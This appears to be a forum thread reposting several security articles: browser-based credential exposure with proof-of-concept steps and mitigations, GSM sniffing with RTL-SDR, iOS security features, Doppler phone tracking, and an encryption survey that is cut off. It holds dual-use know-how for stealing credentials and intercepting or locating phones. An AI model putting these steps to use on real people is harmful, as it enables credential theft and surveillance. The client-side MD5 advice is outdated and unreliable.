Ian Goldberg, and David Wagner. isaac.cs.berkeley.edu. [Online]. (In)Security of the WEP algorithm [3] Sean Gallagher. (2014, January) ArsTechnica. [Online]. Backdoor in wireless DSL routers lets attacker reset router, get admin | Ars Technica Source
  19. Aerosol
    Abstract Web browsers or mobile browsers are software applications that act as the intermediary applications between a user and the World Wide Web and are used to access information from the Web. Some of the popular browsers which we are using in our daily life are Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari, etc. With their wide usage and increasing popularity, they have become one of the major targets for exploitation by hackers. A small mistake during the coding of the application may result in it being vulnerable to intrusions. This article is going to cover a few browser-based attacks, which are not browser specific and can be exploited on any browser if not closed by the application developers during writing or designing the application. The following browser-based attacks, along with the mitigation, are going to be covered in this article: Browser cache: Obtaining sensitive information from the cache stored in browsers. Back and Refresh attack: Obtaining credentials and other sensitive data by using the Back button and Refresh feature of the browser. Passwords in browser memory: Getting the password or credit card details stored in the browser’s physical memory. Autocomplete: Obtaining the credentials of a user from the stored password in the browser. Browser history: Sensitive information leaked through the URL from the browser’s history. 1. Browser Cache Every time when a website is opened, the contents of that web page are sent to the browser’s temporary cache folder of a user’s machine. If those contents on that web page need to load again, the browser opens the page from the cache instead of downloading the page again. If some web application stores and shows the sensitive information to the user (such as their address, credit card details, username), this information could also be stored for caching, and hence it is retrievable through examining the browser’s cache. In IE, these pages are stored in C:\Users\<user_name>\AppData\Local\Microsoft\Windows\Temporary Internet Files In Firefox, these pages are stored in C:\Users\<user_name>\AppData\Local\Mozilla\Firefox\Profiles\<profile-id>\Cache Or by typing the following URL in the address bar of the browser: about:cache In Chrome, these pages are stored in C:\Users\<user_name>\AppData\Local\Google\Chrome\User Data\Default\Cache Or by typing the following URL in the address bar of the browser: chrome://cache Proof of Concept This demo is shown in the Mozilla Firefox browser. Log in to the application, access a few pages and then log out of the application. In the address bar, type about:cache. This shows the cache store in the browser. Go through the list and access the cache content of the website you are interested in. The following screenshot shows the URL for the user dashboard. The user dashboard can have sensitive information like address, phone number, mapped credit card details, e-mail ID, etc. On opening a specific cache entry, the user dashboard can be seen along with the address, phone number, order history, etc. This is shown in the following screenshot Mitigation This problem can be mitigated by setting proper cache control attributes in the response header. Mainly there are two types of cache attributes: 1. Cache-control: no-cache The no-cache attribute indicates that the browser should not use the information that is cached for that particular request–response pair. The browser stores the cache, but instead of showing the content from the cache, it sends the request to the server each time. But again, the cache will be only be in the browser and can be easily accessed by an attacker or malicious user. 2. Cache-control: no-store The no-store attribute indicates that the request–response pair should not be cached and stored in the browser. This applies to the entire page. 3. Using HTML meta tags You can implement the cache control using Meta tags also. Meta tags can be set as follows: <meta http-equiv=”Cache-Control” content=”no-cache” /> <meta http-equiv=”Cache-Control” content=”no-store” /> Here, if the cache-control header is manually appended in the HTTP response and set to no-cache, as shown in the following screenshot, the browser will still cache the page. If the browser cache is accessed, the cached pages of a user’s dashboard can be found. Opening it in Offline mode will show the order details, as shown in the screenshot below. Now, if the value of a cache-control header is set to no-store, no-cache and the browser cache is accessed, the cached pages of a user’s dashboard will not be found. This is shown in the following screenshots. Hence, the developer should analyze the web page content and implement proper cache-control attributes on the pages storing sensitive data. 2. Password in browser memory Most of the applications and servers store the password in hashed or encrypted format, but such hashing/encryption is not applied while storing passwords in the browser memory. The GET and POST requests on any sensitive page where the user is supplying sensitive information (like credentials, credit card number, etc.) is stored in the browser memory while it is open. An attacker with local access to the system can read the sensitive data using memory-reading tools like WinHex. An adversary with physical access to the user’s open browser, after logout, can thus steal the sensitive data from the memory. Once sensitive data like a password is discovered, attackers can escalate their privileges in the application. Proof of Concept Access the application. Enter the valid credentials, as shown in the following screenshot, and browse through the application. After logging out of the application, do not close the browser. Open any memory reading tool like “Winhex” and navigate to the following path, as shown in the screenshots below: Tools ? Open Ram ? Choose a browser (in this case Firefox) ? Select Entire Memory Search through the data using the username. The complete login request for that specific application can be obtained, as shown in the screenshot below. From here, an attacker can steal the login credentials of a user and escalate his privilege. Mitigation As this problem is present in the browser/local machine, using SSL will not mitigate this. A user can’t stop the browser from storing the password or other sensitive information. A solution has to be implemented through which the attacker can’t replay the password value obtained from the physical memory. So, the solution for this is to implement salted hashing. Instead of sending the password to the server, send the salted hash value of the password. Here is how the salted hashing technique works: Store the MD5 hash of the password in the database. (MD5 hash is a cryptographic technique in which the actual value can never be recovered). When a client requests for a login page, the server generates a random number called salt and sends it to the user along with the page. A JavaScript present on the client machine calculates the MD5 hash of the password entered by the user. It then combines the hash value with the salt value and recalculates the hash value. This hash value is sent to the server. The server picks the hash value of the password from its database, combines it with the salt value and calculates the MD5 hash value. If both the values match (it will happen only when the user enters the correct password), the user is authenticated to the application. Every time the salt value will be different; hence, even if the attacker gets the hashed password from the browser’s memory, he can’t replay it. Another solution could be implementing a JavaScript, which forcefully closes the browser once the user is logged out of the application. This will flush the complete memory of the browser, and hence no data can be retrieved from the browser’s memory. 3. Back and Refresh attack Browsers have the ability to maintain a recent record of pages that were visited by a user. The Back and Forward buttons on browsers use this functionality to display the pages recently browsed. In addition, browsers also keep track of variables like username, password, credit card details, etc. that were POSTed to the server while fetching the page. If a user logs in to the website, performs some actions and then logs out, and an adversary has access to the same machine as the user, he can see the logout page that is displayed on the browser window. He can then click the Back button until he reaches the page shown after a successful login. Here, the attacker can click the Refresh button, and the browser automatically resubmits the request with all the information. Proof of Concept Consider the Change Password page of an application: Log in to the application and access the Change Password page. Enter the values in the Current Password and New Password fields and click Submit. The request and response series for the Change Password request are shown in the following screenshots. Request Response The following screenshot shows that the password gets changed successfully. Browse through the application and then log out of the application. After logout, leave the machine without closing the browser window. An attacker who has physical access to this machine can simply click the Back button drop-down list and identify the page which comes after the Change Password page. This is depicted in the following screenshot. When a specific page is clicked, the browser displays the warning that the page has expired, as shown in the following screenshot. At this point the attacker can start a browser proxy tool like Burp and configure the browser to send its requests through the proxy. On the error page, the adversary clicks the Refresh button. The browser shows a pop-up warning to the user about reposting some of the variables in order to access the page, as shown in the screenshot below. The attacker clicks the “Resend” button. The attacker can see the request going to server using the configured proxy tool and can steal the password value of the user. This is shown in the screenshot below. Variation of the attack Many times it has been observed that the site is using redirection on successful login but not on unsuccessful login. If a login page is secured by CAPTCHA and the user provides the correct credentials but the wrong CAPTCHA value, then the user is again served with the login page with an error message. In this case too, an attacker can steal the credentials using the Back and Refresh features. Even if CAPTCHA is not implemented, an attacker can get some sensitive information like correct username or password. Proof of Concept Access the login page of the application and provide the correct username and wrong password, as shown in the following screenshot. After validating the credentials, the server responds with a “200 OK” with error stating “Username/Password is wrong”. This is shown in the screenshots below. Click the Back button and access the page which came after providing the incorrect credentials, as shown in the following screenshot. The browser warns that the document has expired and asks the user to resend the data to the server, as shown in the following screenshot. Configure the proxy between the browser and server and intercept the data going to the server. Click the “Resend” button. The user credentials can be seen in cleartext in the captured request, as shown in the following screenshot. Cause of problem The browser keeps track of the requests sent to server to fetch particular pages. In this case, the Change Password page is “changepass.aspx” and the page which appears after is “changepass1.aspx”. The “changepass1.aspx” page is displayed after providing the Current, New and Confirm Password values. So, the browser remembers the request which is sent to get the “changepass1.aspx” page. The following steps are present for the existing scenario: The user accesses the “changepass.aspx” page. The user types the current password, new password, and confirm new password and submits the request which is sent to “changepass1.aspx”. The user is authenticated in the “changepass1.aspx” page. The user is served with the “changepass1.aspx” page. When the attacker clicks the “changepass1.aspx” page, the request which was sent to render “changepass1.aspx” is resent to the server. This request contains the current, new and confirm new password values. Mitigation The following steps will be performed if an intermediate page is implemented between “changepass.aspx” and “changepass1.aspx”: The user accesses the “ChangePass.aspx” page. The user types the current password, new password, and confirm new password and submits the request to “CheckPass.aspx” The user is authenticated in the “CheckPass.aspx” page. The user is redirected to the “ChangePass1.aspx” page. The browser sends a new request to fetch the “ChangePass1.aspx” page. Now, even if an attacker refreshes the “changepass1.aspx” page, the request which the browser used to get “changepass1.aspx” will be sent, which is a redirect request sent by “CheckPass.aspx”. The request will be a simple GET request for fetching “ChangePass1.aspx” and there will be no value going in that request. The solution should be implemented on all the pages where a form is being submitted or some sensitive action is happening. 4. Autocomplete In many applications, when the user submits credentials, the browser shows a pop-up for remembering the password. If the user clicks “Remember password”, the browser will store the password and automatically enter it when the same application is accessed again. The feature is convenient for users, as they don’t have to remember and enter the password, but it poses a problem if the user is using this feature on a shared or public computer. An attacker can easily retrieve the stored password from the browser. Even if the stored passwords are encrypted or protected by the master password (a password to access the stored passwords), an attacker can retrieve this password by visiting the application, for which the password is stored, in the browser. An attacker enters the username and the browser automatically fills the password field. An attacker can run a proxy tool like Burp to intercept the request going to server and then can obtain the cleartext or encrypted password going to server. The saved password can be accessed by navigating to: Firefox: Options ? Security ? Saved Password Chrome: Settings ? Manage password (Under password and forms) IE: Internet Options ? Content ? AutoComplete Settings ? Manage Passwords Proof of Concept Here, after entering the credentials, the browser shows a popup asking the user if the password for the website should be remembered. This is depicted in the screenshot below. If the user clicks “Remember Me”, the password will be stored in the browser. In Firefox, the saved password can be accessed by navigating to Tools ? Options ? Security ? Saved Password. This is depicted in the following screenshot. When the “Saved Passwords” button is clicked, the browser shows the list of websites for which the passwords are stored in the browser. This is shown in the following screenshot. If the “Show Passwords” button is clicked, the user will be able to see the stored passwords, as shown in the screenshot below. Now, suppose the list of stored passwords is secured by a master password in the browser. Then the user has to enter the master password to access the list, as shown in the screenshot below. In this case, an adversary needs to use an intermediate proxy tool to intercept the request going to the server. Go to the application and double click the username field. It will show the list of the stored usernames. Click one username and the browser will automatically fill the password from the stored password list. This password can’t be seen, as it is hidden behind the asterisk symbol. A user can click the Submit button and capture the request going to server using a web proxy tool like Burp. From the intercepted request, it is easy to find the password of submitted username, as the data can be seen in cleartext. This is shown in the following screenshot. Mitigation The problem can be solved by setting the Autocomplete attribute in the Login and other sensitive pages. Make sure the Autocomplete attribute for all sensitive pages is set to “off”. A sensitive page can be the Login page, change password page, edit information page, etc. If Autocomplete is not configured on the page, then by default it is “ON” and the application will store the information. This can be done using the following command: < form autocomplete=”off”> – It will set Autocomplete to “OFF” for all form fields in the page. Even if the browser is configured to store the password, the above code will overwrite the browser settings. The Autocomplete attribute is ignored in the latest versions of all browsers. Hence, the above solution won’t work for the latest versions of the browsers. As a security best practice, a user should be warned with a generic warning message about storing the cleartext password in the browser. A more advanced way of implementation, involving HTML and JavaScript, can be used. A sample code is available here. 5. Browser history When a user submits any data, it goes to the server either in a GET request or in a POST request. In a GET request the user data is present in the URL itself, whereas in a POST request the user data is present in the body of the request. The following two screenshots show user data going in GET and POST requests. All GET requests that are accessed from the browser are stored in the browser’s history and cache. This data can be viewed even if the user is logged out or the browser is closed by checking the history of the browser. So, if an application sends the user’s sensitive information through a GET request, i.e. through URL, an attacker can obtain this data by checking the browser history. GET request: POST request: Proof of Concept Here, after entering the credentials on the website when the user clicks the LOG IN button, the credentials are sent in a GET request. This is shown in the following screenshot. The request going to server is captured in Burp, which shows that the user provided data is sent as a GET request. This is depicted in the following screenshot. So, an attacker who has physical access to the user’s machine can see these credentials in the browser’s history, as shown in the screenshot below. In the same way, if an application sends other sensitive data like credit card details through the GET request, the data can be accessed from the browser history. Mitigation Never send sensitive information in the GET request. Data containing sensitive information should be sent through the POST request. When sensitive information is sent in the POST request, the data goes in the request body, and hence can’t be accessed from the browser history, because the browser history only shows all the GET requests. Implement the POST method in the form as shown below: <form name=”login” action=”index_submit” method=”POST” accept-charset=”utf-8?> The above screenshots shows that no sensitive data is being stored in the browser history when the application is using POST instead of the GET method. Conclusion So, we have now discussed some browser-based attacks in this article. These attacks are applicable on web as well as mobile browsers. To perform any of the above attacks, an attacker has to depend on the following points: The attacker should have physical access to the victim’s machine. For some attacks, the browser should not be closed. The victim should not delete the browsing history, cache, etc. Due to all these limitations, the risk rating for all the above mentioned attacks ranges from Medium to Low, but depending on the information received, it can be high too. If an attacker can get account/credit/debit card details in the browser’s cache or through the Back and Refresh attack, then the risk rating would be high. All these vulnerabilities can be avoided by implementing the proper controls discussed in this article. References https://devcenter.heroku.com/articles/increasing-application-performance-with-http-cache-headers https://www.owasp.org/index.php/Testing_for_Vulnerable_Remember_Password_(OTG-AUTHN-005) http://repo.hackerzvoice.net/depot_cehv6/CEHv6%20Module%2059%20How%20to%20Steal%20Passwords/Stealing_passwords_via_browsers.pdf Source
  20. Aerosol
    Introduction The Global System for Mobile Communication or GSM is a wireless communication that uses digital technology and is widely deployed across the globe for mobile communications, such as mobile phones. This technology utilizes microwaves, and its signal transmission is divided by time, mostly known as Time Division Multiple Access (TDMA). In this article, I will be discussing the method that could be used to see the traffic on a GSM network and how an attacker could abuse the GSM network. Mobile communication technology was already developed and widely used in the early 1980s. For the first time, the C-NET system was developed in Germany and Portugal by Siemens, the RC-2000 system was developed in France, and the NMT system was developed in the Netherlands and Scandinavia by Ericsson, as well as the TACS system which operates in the UK. GSM appeared in mid-1991 and eventually turned into mobile telecommunications standard for the whole of Europe, maintained by the ETSI (European Telecommunications Standards Institute) technical committee. GSM started its commercial operation at the beginning of the last quarter of 1992 because GSM is a complex technology and needed more assessment to be used as standard protocol. In September 1992, type approval standards for mobile agreed to consider and incorporate dozens of test items for GSM production. In Europe, GSM was originally designed to operate at the frequency of 900 MHz. In this frequency, the uplinks use frequencies between 890 MHz to 915 MHz, and frequency between 935 MHz to 960 MHz is used for downlinks. The bandwidth used is 25 MHz ((915 – 890) = (960 – 935) = 25 MHz), with a channel width of 200 kHz. GSM Network Architecture Typical GSM network architecture is divided into 3 parts: Mobile Station (MS) Base Station Sub-system (BSS) Network Sub-system (NSS) And all elements of the network at the top form a PLMN (Public Land Mobile Network). Picture 1. GSM network architecture. Mobile Station or MS is a device used by the customer for making phone calls. This device consists of: Mobile Equipment (ME) or the handset (UM) is a GSM device that is located on the user’s or customer’s end that serves as a terminal transceiver (transmitter and receiver) to communicate with other GSM devices. Subscriber Identity Module (SIM) or SIM card is a card that contains all customer information and some information about services. ME can’t be used without SIM in it, except for emergency calls. The data stored in the SIM in general are: International Mobile Subscriber Identity (IMSI). Mobile Subscriber ISDN (MSISDN). Encryption mechanism. Base Station System or BSS consists of: Base Transceiver Station (BTS) is a GSM device that is directly related to MS and serves as the sender and receiver. Base Station Controller (BSC) is a controller device for base stations located between the BTS and MSC. Network Sub System or NSS consists of: Mobile Switching Center (MSC) is a central network element in a GSM network. MSC works as the core of a cellular network, where MSC main role is for interconnection, both among the cellular or wired network PSTN or with the data network. Home Location Register (HLR) is a database that saves the data and customer information permanently. Visitor Location Register (VLR) is a database of the subscribers who have roamed into the jurisdiction of the Mobile Switching Center (MSC) which it serves. Authentication Center (AuC) authenticates each SIM card that attempts to connect to the GSM core network (typically when the phone is powered on). This also checks the validity of the customer. Equipment Identity Registration (EIR), is often integrated to the HLR. The EIR keeps a list of mobile phones (identified by their IMEI) to be banned from the network or monitored. This is designed to allow tracking of stolen mobile phones. GSM Layer There are 3 layers in the GSM network: Layer 1 or the physical layer, for setting the channels. Layer 2 or the data-link layer, whose main role is to identify the data that is sent from UM to BTS. Layer 3 consist of 3 parts: Radio Resource (RR), Mobility Management (MM) and Call Control (CC) that serves as a regulator for radio, mobile management and call control. Illustration of How GSM Works [mg]http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031815_2231_Introductio2.png icture 2. Illustration of how GSM works. Mobile phone is input with the destination number and connects to the nearest BTS. BSC and BTS send to MSC to continue and proceed to the AuC for checking the user identification. MSC proceeds to the HLR / VLR to check the existence of mobile phone. BSC and MSC proceed to the nearest BTS where the destination mobile located. Problem The background of this issues lies in the GSM network. Due to leaking of the design of encryption in 1994, it could be attacked, such as sniffing the voice in an established communication. Attacking 1. Packet Analysis At this stage, the attacker will do packet analysis on one of GSM providers (for this example, the attacker will attack one of the service providers in Indonesia). The attacker is using multiple devices for packet analysis (Openmoko and Nokia 3310) and using Wireshark to dissect information used in GSM networks such as: Encryption used by the provider. ARFCN number. Location of the mobile phone, etc. The first step is that the attacker will analyze encryption used by the provider: Picture 3. A5/1 encryption used by the provider. In the picture above, the encryption used by the provider is A5/1. In the second packet, we could see the location in ARFCN, because ARFCN is determinant of the uplink and downlink signal to a GSM network. Picture 4. ARFCN (downlink) in use. From the above picture, we could see that the provider uses ARFCN 881. For more details, the frequency for ARFCN 881 is as follows: ARFCN: 881 Downlink frequency: 1879000000 Hz Uplink frequency: 1784000000 Hz Distance: 95000000 Hz Offset: 512 Band: GSM1800 (DCS 1800) It could be assumed that the provider uses encryption A5/1 and 1879000000 Hz frequency for downlink and 1784000000 Hz for uplink. However, ARFCN is not static in a communication. Picture 5. ARFCN calculation (GSM 1800) Picture 6. GSM900 frequency allocation in Indonesia. Picture 7. GSM1800 frequency allocation in Indonesia. 2. Authentication of a Communication When MS communicates to a BTS, MS identifies himself using IMSI and IMEI, and BSC to MSC communication to respond to IMSI. The authentication function is to assure that MS is a legitimate user. An illustration can be seen in the image below: Picture 8. MS Authentication flow. An explanation for the above picture is as follows: MS sends IMSI and IMEI to BSC. BSC requests IMSI and IMEI to MSC. MSC responds and sends RAND, SRES and Ki. BSC sends RAND to MS. MS responds with SRES’. BSC checks SRES’. 3. Kc Generation On A5/1 Picture 9. Kc generation on A5/1. The picture above shows the process of Kc generation before being used to send and receive a communication. RAND is a random number generated by the AuC when a customer makes a request authentication to the network. RAND isused to generate SRES and Kc. Ki is key authentication paired with IMSI when a SIM card is made. Ki only exists on the SIM card and the Authentication Center (AuC). Ki never get transmitted over the GSM network. A8 is an algorithm that’s being used to calculate Kc. Ki and RAND are inserted into the A8 algorithm and the result is Kc. The A8 algorithm exists on the SIM card and the AuC. Kc is the key used in the A5 encryption algorithm to write and decipher data that is being sent when communication occurred. 2. Sniffing GSM In Realtime In order to be able to sniff a GSM packet, you must have a hardware that works as a receiver. For example, the RTL-SDR with rtl2832 chip. However, this hardware has a limitation. The maximum packet capture is 16 kHz wide. In other words, not all GSM packets can be captured using this hardware. Picture 10. Sample packet captured with rtl2832 DVB (max 16 kHz). GSM uses 200 kHz for communication and it is divided into 8 slots (200 kHz / 8 = 25 kHz / slot). Picture 11. Downlink and uplink frame illustration. Before we could start capturing GSM packets, first we must know the ARFCN in use. One method that could be used to find out the ARFCN is by using Blackberry Engineering Mode. In order to use that feature, you can simply search for “blackberry engineering mode calculator“. After entering the engineering mode, you can see the ARFCN currently in use as you may see in this picture: Picture 12. Blackberry engineering mode (ARFCN 114). After knowing the ARFCN, we could proceed to capture the downlink packets. The capturing process could be seen in this picture (the result is not optimal due to a standard antenna being used): Picture 13. Sample captured with DVB (only to see the downlink frequency). From the above picture, we could see that the signal is not strong enough and it could increase the packets lost during capture period. Here’s an example of captured GSM packets using RTL-SDR and analyzed using Wireshark: Picture 14. Sample GSM packet captured using RTL-SDR and analyzed using Wireshark. Conclusion From the above explanation, we could conclude that communication through GSM exposes some security concerns. An attacker who understands how the GSM protocol works and has complete GSM standard documentation could find a way to attack the GSM networks, especially if security is poorly implemented. Source
  21. Aerosol
    Apple uses iOS (operating system) to power many of its mobile devices such as iPhone, iPad and so on. From the beginning, security has been placed at the core of iOS. There are many inherent features that secure the device and its resources at different levels. This article aims to provide answers to questions such as the following: What really happens when an iPhone is powered on? How is data at rest secured by iOS? If the device is lost or stolen, can the attacker view or modify my personal data? How are privacy controls enforced? For ease of understanding, we wil deal with each of these topics in separate sections. Let’s begin! Boot level security mechanism In the desktop computer world, an attacker can access the data present on the hard disk even without knowledge of the password of that system. For instance, he can remove the hard disk and plug it to a different system and read the data, or he can boot the system into a different OS by using a live CD. But do you think it’s possible in the case of an iPhone? I.e., Can an attacker who has access to an iPhone remove the chip and read its data or sideload another OS to access data? Not really under normal circumstances! This is because iOS devices don’t load firmware that is not signed by Apple. Taking a look at the boot level security mechanism would help us to understand this in a better fashion. So what really happens when you power on your iPhone? When an iOS device is turned on, the processor immediately executes code known as the boot ROM. This boot ROM code is something that is designed during chip fabrication and is implicitly trusted. This boot ROM also contains root certificates of Apple which will be used to signature check the loading of the next stages. LLB (Low Level Boot loader) is the next thing that will be loaded after the signature check. LLB finishes its task and loads next stage boot loader iBoot after verifying its signature. iBoot verifies and runs iOS kernel. Thus, as shown in the following figure, at each stage a signature check is done before loading the next step. This is called “Chain of Trust”. Hence, under normal circumstances, this chain of trust ensures iOS runs on valid devices only and also verifies that the phone is not booted into another operating system. Can this signature check be bypassed so that we can flash our own boot loader? Yes it can be. Several vulnerabilities have been identified in boot ROM code which can be exploited to not only flash our own boot loader but also to bypass the signature checks of every stage. Remember that if one link is compromised, it would ultimately lead to compromise of all the other links that follow. How this can be done will be discussed in a separate post. Secure Enclave You must have heard about the finger print sensor introduced in iPhone 5S. Apple says this finger print information is encrypted and stored in a ‘Secure Enclave’ inside the phone and is never backed up to iCloud or any Apple servers. So what is this Secure Enclave and how does it work? Secure Enclave is a coprocessor created inside Apple A7 processor. All the cryptographics required for data protection are handled by this. It has a secure boot and updates which are separate from the main processor. Secure Enclave is a concept that is similar to ARM’s Trust zone technology. Following is a sample depiction of hardware architecture of trust zones. As shown above, a new mode called ‘secure mode’ is added to the processor. In simple terms, it kind of creates two-world architecture on the same device. The first world that runs normal iOS apps (user mode) and the second world that runs only trusted code (secure mode). Data written to the RAM when in secure monitor mode cannot be accessed when in user mode. The following steps compiled from iPhone5S: Inside the Secure Enclave | Fortinet Blog explain how Secure Enclave works while validating the fingerprint in iPhone 5S: User enters his fingerprint Locking service calls an API present in secure world Processor switches to secure world The bits which characterize the fingerprint move from sensor to processor This data cannot be eavesdropped or modified by any app because this process is running in secure mode which is different from user mode Necessary cryptographic verifications are done & access granted. Apple thus argues that even if the kernel is compromised, the integrity of data protection will be maintained. As per Apple’s documentation, “Each Secure Enclave is provisioned during fabrication with its own UID (Unique ID) that is not accessible to other parts of the system and is not known to Apple. When the device starts up, an ephemeral key is created, entangled with its UID, and used to encrypt the Secure Enclave’s portion of the device’s memory space”. Code Signing Apps have today become critical components of any mobile operating system. Apple believes enforcing strict security at the application level is important to ensure overall security of the device. Apple has gone to great extent to make this happen, and code signing is one step in that direction. To put it simply, Apple does not allow running any app which is not approved by it! To ensure that all apps are from a trusted and approved source and have not been tampered with, iOS requires all apps to be signed by Apple. Default apps like Safari are signed by Apple. Other third party apps are also to be verified and signed by Apple. In other words, the above discussed chain of trust principle continues from boot loader to OS to apps. But how does this actually work? Does this mean I cannot run an app developed by me if it’s not signed by Apple? In order to develop and install apps on iOS devices, developers must register with Apple and join the iOS Developer Program. The real-world identity of each developer, whether an individual or a business, is verified by Apple before their certificate is issued. This certificate enables developers to sign apps and submit them to the App Store for distribution. As a result, all apps in the App Store have been submitted by an identifiable person or organization, serving as a deterrent to the creation of malicious apps. These apps are further reviewed by Apple to ensure they operate as described and don’t contain obvious bugs or other problems. Apple believes this process would give customers more confidence in the quality of apps they buy. If corporate companies want to use in house apps for their internal purpose, they need to apply for iOS Developer Enterprise program (iDEP). Apple approves applicants after verifying their identity and eligibility. Once an organization becomes a member of iDEP, it can register to obtain a Provisioning Profile. This is the one that permits in-house apps to run on devices it authorizes. Users must have the Provisioning Profile installed in order to run the in-house apps. This ensures that only the organization’s intended users are able to load the apps onto their iOS devices. In-house apps also check to ensure the signature is valid at runtime. Apps with an expired or revoked certificate will not run. This code signing process is depicted in the following figure. Thus we have explored three major security features in iOS – secure boot process, Secure Enclave, and application signing in this article. In the next part, we will look into other security features such as data protection, encryption and so on. ‘Til then, Happy Hacking! Source
  22. Aerosol
    GSM or Global System for Mobile Communication is a technology that’s widely used in mobile communications, especially mobile phones. This technology utilizes microwave and signal transmission divided by time, so that the signal information sent will arrive at the destination. The GSM standard for mobile communications as well as mobile technology is deployed more than its counterparts around the world, like CDMA. At this time we will discuss how to track a cell phone by using the Doppler effect, in other words we will make it easier to know the whereabouts of a person just by having information such as cell phone numbers. GSM Network Architecture Typical GSM network architecture is divided into 3 parts: Mobile Station (MS) Base Station Sub-system (BSS) Network Sub-system (NSS) All elements of the network at the top form a PLMN (Public Land Mobile Network). Picture 1. GSM network architecture Mobile Station or MS is a device used by the customer for making phone calls. This device consists of: Mobile Equipment (ME) or the handset (UM) is a GSM device that is located on the user or customer end that serves as a terminal transceiver (transmitter and receiver) to communicate with other GSM devices. Subscriber Identity Module (SIM) or SIM card is a card that contains all customer information and some information about services. ME can’t be used without a SIM in it, except for emergency calls. The data stored in the SIM in general are: International Mobile Subscriber Identity (IMSI) Mobile Subscriber ISDN (MSISDN) Encryption mechanism Base Station System or BSS consists of: Base Transceiver Station (BTS), a GSM device that is directly related to MS and serves as the sender and receiver. Base Station Controller (BSC), a controller device for base stations which is located between the BTS and MSC. Network Sub System or NSS consists of: Mobile Switching Center (MSC), a central network element in a GSM network. The MSC works as the core of a cellular network, where its main role is for interconnection, both among the cellular or wired network PSTN or with the data network. Home Location Register (HLR), a database that saves the data and customer information permanently. Visitor Location Register (VLR), a database of the subscribers who have roamed into the jurisdiction of the Mobile Switching Center (MSC) which it serves. Authentication Center (AuC) authenticates each SIM card that attempts to connect to the GSM core network (typically when the phone is powered on). This also checks the validity of the customer. Equipment Identity Registration (EIR), is often integrated to the HLR. The EIR keeps a list of mobile phones (identified by their IMEI) which are to be banned from the network or monitored. This is designed to allow tracking of stolen mobile phones. GSM Layers There are 3 layers in the GSM network: Layer 1 or the physical layer, for setting the channels. Layer 2 or the data-link layer’s main role is to identify the data that is sent from UM to BTS. Layer 3 consists of 3 parts: Radio Resource (RR), Mobility Management (MM) and Call Control (CC) that serve as regulators for radio, mobile management and call control. Picture 2. Illustration of how GSM works Mobile phone is input with the destination number and connects to the nearest BTS. BSC and BTS sends to MSC and proceeds to AuC for checking the user identification. MSC proceeds to the HLR / VLR to check for the existence of the mobile phone. BSC and MSC proceed to the nearest BTS where the destination mobile located. How Doppler Works Doppler is a change in the frequency or wavelength of a wave source that is received by the observer. This is the Doppler effect formula which is not affected by wind: Doppler effect formula which is influenced by the wind: This is the illustration of Doppler effect: Picture 3. Doppler effect illust From the above picture, there are 3 persons: A, B and C. A is the person in the middle who could detect the source of the wave/sound from B or C. Because the wave/sound that came from B or C travels in a certain frequency and distance, the A person could distinct the source of the wave/sound. Concept In this article, we are proposing a GSM radar using the Doppler effect, where the Doppler effect itself will be used to listen for the mobile phone uplink. There are some literature and references that mention about the Doppler effect being used to identify a signal if the Doppler effect is combined with the right filter processing according to the signal characteristic being transmitted. Research 1. OpenBTS Installation This article won’t go further step by step on this OpenBTS installation until it could be used, because there are already a lot of tutorials which cover the installation process. For this research, we are using USRP N200 from Ettus Research. But as we proceed using OpenBTS with USRP N200, we realize that there is an anomaly in the signal transmitted by USRP N200. So, we are using a spectrum analyzer to figure out and find a solution for the signal anomaly. This is the setup we are using: Picture 4. Using spectrum analyzer to figure out USRP N200 signal anomaly Picture 5. Signal anomaly as seen on spectrum analyzer As you can see from the picture above, the signal generated by USRP N200 looks like a horn and the noise is quite high. The possible cause for that anomaly is USRP N200 clock is not accurate, and the solution for that is by adding a filter, so the final result will be a correct GSM modulation like this picture: Picture 6. Correct GSM modulation after adding a filter 2. Doppler Design After doing some research on Doppler design, we found out that some design is not capable for a frequency of 900 MHz, but we have a workaround and modified existing Doppler design so it capable of reaching 900 MHz and even higher. This is the block diagram for modified Doppler design (courtesy of Ramsey): Picture 7. Modified Doppler design Picture 8. Tracking mobile phone illustration Conclusion From the above explanation, we could conclude that the Doppler effect could be used to lookup the position of a device transmitting a signal in a certain frequency. We could take this research further to detect any kind of living creature (e.g. endangered species) that in some way is transmitting a signal in a certain frequency, as long as we have the sound sample of that creature. Source
  23. Aerosol
    Keeping personal information secure and protected remains a top priority for computer users who now rely heavily on information systems to manage a large part of their personal and business lives. One of the ways to make sure only authorized users have access to information is the use of encryption, a process that transforms data from “cleartext to ciphertext” and back as a means to keep it secret from others. This is done through a combination of hardware- and software-based encryption. The scope is always the prevention of unintended data leakage. The wide variety of types of encryption available (e.g., symmetric- and asymmetric encryption, hardware-based or software-based) can make a person uncertain on which one is best to suit their needs. Each of the cryptographic systems addresses specific aspects of keeping systems secure, so it is important to identify which one is the most appropriate for the situation. This article surveys how to gain cryptographic data protection with a variety of methods and mechanisms for the sake of digital privacy as well as solutions for data-at rest and data-in-motion. It also discusses new encryption techniques. The Need of Encryption for Data Protection Encryption is a necessity for organizations and users that handle sensitive data. Data ought to be secured for the entire duration of their lifecycle (at-rest, in-transit and in-use). Whether they are at rest in storage and databases on site or backed up in a cloud, whether they are sent to end users within organizations or remotely accessed through mobile devices, all data need proper protection and ad-hoc solutions. The growing use of mobile devices to access sensitive data and corporate applications along with the use of cloud solutions for software, storage, hardware and services has opened a new world of security problems. Data loss prevention, security practices and strategies employed (firewalls, IDS, coupled with authentication and access controls) in addition to encryption tools are more important than ever as information are no longer being stored and processed in the safety of companies’ on-site servers and behind firewalls, but are actually being manipulated and transferred through a variety of communication channels. Data protection is nothing new, but it remains a significant challenge for organizations and businesses needing to find better ways to protect user data from unauthorized use. Be it corporate-, personal-, customer- or transaction-data, the risk of theft or loss throughout the lifecycle is massive. With data theft caused by employees and external parties on the rise, businesses risk their reputation, lack of regulatory compliance, and, ultimately, loss of clients. Lack of Encryption Why encrypting? Since a complex password by itself is no longer good enough as a means to protect corporate or personal data, by encrypting the data exchanged between the client and server, any sensitive information can be sent over a network, such as the Internet, with less risk of being intercepted during transit. Plaintext can be easily intercepted by prying eyes and eavesdroppers when transiting in data streams; information can be stolen or altered. Encryption is an effective way of making sure data remain secure. Data, however, is not just vulnerable when in transit. Some of the worst data security breaches noted in the 21st century and pertaining to lack of encryption go far back as 2005 when CardSystems Solutions’ system was hacked and was victim of an SQL Trojan attack; hackers gained access to names and accounts numbers of more than 40 million card holders. Security reports noted that the company never encrypted the data, thus exposing personal info on all its clients. Another noteworthy incident 